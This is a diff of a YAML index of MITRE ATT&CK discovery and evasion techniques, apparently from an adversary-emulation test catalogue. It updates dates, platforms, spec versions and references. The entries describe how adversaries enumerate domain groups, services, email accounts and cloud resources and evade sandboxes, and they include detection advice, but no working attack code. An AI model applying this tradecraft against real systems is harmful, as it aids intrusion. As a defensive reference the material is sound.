+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -50377,12 +51081,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -50423,12 +51126,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -50513,7 +51215,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -50575,12 +51276,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -50631,12 +51331,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -50647,7 +51346,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -50662,7 +51360,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -50710,7 +51407,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests:
     - name: Azure Security Scan with SkyArk
@@ -50845,12 +51543,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -50892,122 +51589,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -51022,6 +51670,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -51031,9 +51685,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -51043,102 +51702,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -51192,7 +51886,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -51222,7 +51915,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -51260,12 +51953,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -51292,14 +51984,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -51328,7 +52019,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -51388,7 +52078,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
